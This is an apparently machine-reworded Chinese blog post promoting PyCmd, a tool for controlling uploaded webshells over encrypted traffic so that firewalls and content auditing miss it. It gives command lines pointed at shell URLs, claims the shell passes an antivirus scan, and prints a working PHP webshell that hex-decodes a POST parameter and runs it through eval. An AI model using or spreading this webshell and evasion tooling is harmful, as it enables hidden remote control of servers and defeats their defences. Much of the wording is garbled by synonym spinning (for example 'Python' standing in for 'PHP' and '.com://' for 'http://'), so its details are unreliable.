浅析PyCmd加密隐形木马

"以前写了1个应用场景python的一句话木马客户端程序，这一程序流程的功效大概就是说以便绕开安全防护机器设备，使敏感数据能在互联网里随意穿行。因为程序编写工作能力有限公司，那时候以python程序流程做为手机客户端，Python编码做为服务器端，凑合可用，可是欠缺jsp的服务器端，使之作用很局限性。幸亏有高手caomei相帮，协助建立了jsp端的编码，故将二者紧密结合，使用方便。 

PyCmd可用自然环境

当网络服务器容许发送随意文档，且对文档內容不开展财务审计查验，但因为其互联网界限有服务器防火墙会阻拦财务审计通讯的统计数据。这时候人们能取得成功发送一句话木马，显然联接水果刀的那时候会出現600不正确，这时能够应用pycmd专用工具，由于其会对相互之间通讯的內容数据加密解决。

PyCmd应用

我这儿提前准备了2个吊舱，分別配有Python与jsp的软件环境，用于仿真模拟真實的网络服务器。

为了更好地，我早已把服务器端木马程序放进了网络服务器网站日志下：

Python网址木马病毒详细地址：10.0.3.13/test/p.Python

jsp网址木马病毒详细地址：192.168.10.149:8080/headgmp/upload/2018_06_12/4.jsp

查询shell的状况：

这时，运作PyCmd.py程序流程：

python PyCmd.py -u .com://10.0.3.13/test/p.Python -p test [--proxy]

或是

python PyCmd.py -u .com://192.168.10.149:8080/headgmp/upload/2018_06_12/4.jsp -p test [--proxy]

程序流程会全自动分辨键入的网站风格，这儿是jsp种类的网址。

运作程序流程可键入下列主要参数：

-h 查询协助信息内容

-u 网址木马病毒详细地址

-p 木马病毒shell登陆密码

–proxy 打开当地代理商（便捷调节）

注：当打开当地调节，需运作Fiddler程序流程，或是别的抓包软件。

PyCmd数据库加密

PyCmd程序流程的优点取决于它对来往的统计数据开展了数据加密，能够绕开服务器防火墙对统计数据內容的校检。

当实行cmd指令时，根据Fiddler抓包查询统计数据：

查询收益信息内容：   

PyCmd木马病毒隐藏

用D盾扫描仪发送的木马病毒服务器端文档，显示信息为一切正常文档，取得成功躲避杀毒（2016.9.18日检验結果）

这儿演试Python木马查杀：

全句智能化原創Python

$string=”;

$password=’test’;

if(isset($_POST[$password])){

$hex=$_POST[$password];

For($i=0;$i<strlen($hex)-1;$i+=2){

$string.=chr(hexdec($hex[$i].$hex[$i+1]));

}

@eval($string);

}else{

echo “This Is a Test!”;

}

?>

专用工具免费下载

PyCmd 下载链接 

新项目详细地址：https://github.Com/tengzhangchao/PyCmd 

表明：绕开服务器防火墙检验的方式许多，这儿仅仅出示了这种构思，pycmd就是我上年写的这款专用工具，近期准备健全其作用，编码早已开源系统。

全文联接：PyCmd 数据加密隐型木马病毒